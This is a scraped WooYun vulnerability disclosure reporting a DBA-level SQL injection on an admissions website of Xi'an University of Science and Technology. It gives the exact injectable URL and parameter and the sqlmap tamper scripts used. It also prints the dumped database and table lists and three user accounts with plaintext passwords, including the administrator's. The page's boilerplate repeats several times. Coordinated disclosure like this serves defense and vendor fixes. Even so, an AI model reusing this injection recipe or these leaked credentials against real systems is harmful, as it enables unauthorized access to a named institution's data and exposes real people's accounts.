西安科技大学某站存在SQL注入dba权限 | wooyun-2016-0170019| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0170019

漏洞标题：西安科技大学某站存在SQL注入dba权限

漏洞作者：猪猪虾

提交时间：2016-01-17 15:39

修复时间：2016-03-06 14:18

公开时间：2016-03-06 14:18

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2016-01-17：细节已通知厂商并且等待厂商处理中
2016-01-22：厂商已经确认，细节仅向厂商公开
2016-02-01：细节向核心白帽子及相关领域专家公开
2016-02-11：细节向普通白帽子公开
2016-02-21：细节向实习白帽子公开
2016-03-06：细节向公众公开

简要描述：

西安科技大学某站存在SQL注入dba权限

详细说明：

注入点：http://zs.xust.edu.cn/searchys.jsp?years=2013

使用脚本：charencode.py,apostrophemask.py

available databases [25]:
[*] CTXSYS
[*] HR
[*] KJDX
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] WKSYS
[*] WMSYS
[*] XDB
Database: KJDX
[35 tables]
+-------------------+
| PICTURE           |
| QQ_TB_TMP         |
| SYS_FUNC          |
| SYS_JB            |
| SYS_LINK          |
| SYS_MODULE        |
| SYS_ROLEAUTHORITY |
| SYS_USER          |
| SYS_USERAUTHORITY |
| TD_SCHOOLLINK     |
| T_CITY            |
| T_COLL            |
| T_FILE            |
| T_INFO            |
| T_INFOTYPE        |
| T_KFCX            |
| T_LYZX            |
| T_PIC             |
| T_PICTYPE         |
| T_SPE             |
| T_ZSJH            |
| T_ZSJH_TEMP       |
| T_ZSQK            |
| T_ZSYS            |
| ZS_LYDQDM         |
| ZS_TD_KLDM        |
| ZS_TD_KSLBDM      |
| ZS_TD_MZDM        |
| ZS_TD_PCDM        |
| ZS_TD_WYYZDM      |
| ZS_TD_XBDM        |
| ZS_TD_ZZMMDM      |
| ZS_T_JHK          |
| ZS_T_TDD          |
| ZS_XYZYDMB        |
+-------------------+
Database: KJDX
Table: SYS_USER
[5 columns]
+-----------+----------+
| Column    | Type     |
+-----------+----------+
| ID        | NUMBER   |
| LOGINNAME | VARCHAR2 |
| NAME      | VARCHAR2 |
| PASSWORD  | VARCHAR2 |
| YHJB      | NUMBER   |
+-----------+----------+
Database: KJDX
Table: SYS_USER
[3 entries]
+-----+---------+------+------------+-----------+
| ID  | NAME    | YHJB | PASSWORD   | LOGINNAME |
+-----+---------+------+------------+-----------+
| 1   | <blank> | 0    | xustzsbps  | admin     |
| 65  | lzp     | 1    | n1sh1shu1a | lzp       |
| 127 | ad      | 2    | 159357as   | zzz       |
+-----+---------+------+------------+-----------+

dba权限

速度太慢不在深入测试！

漏洞证明：

修复方案：

过滤

版权声明：转载请注明来源猪猪虾@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2016-01-22 09:06

厂商回复：

感谢提供漏洞信息！非常感谢！

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0170019

漏洞标题：西安科技大学某站存在SQL注入dba权限

相关厂商：西安科技大学

漏洞作者：猪猪虾

提交时间：2016-01-17 15:39

修复时间：2016-03-06 14:18

公开时间：2016-03-06 14:18

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源猪猪虾@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0170019

漏洞标题：西安科技大学某站存在SQL注入dba权限

相关厂商：西安科技大学

漏洞作者： 猪猪虾

提交时间：2016-01-17 15:39

修复时间：2016-03-06 14:18

公开时间：2016-03-06 14:18

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2016-0170019"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 猪猪虾@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：猪猪虾

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源猪猪虾@乌云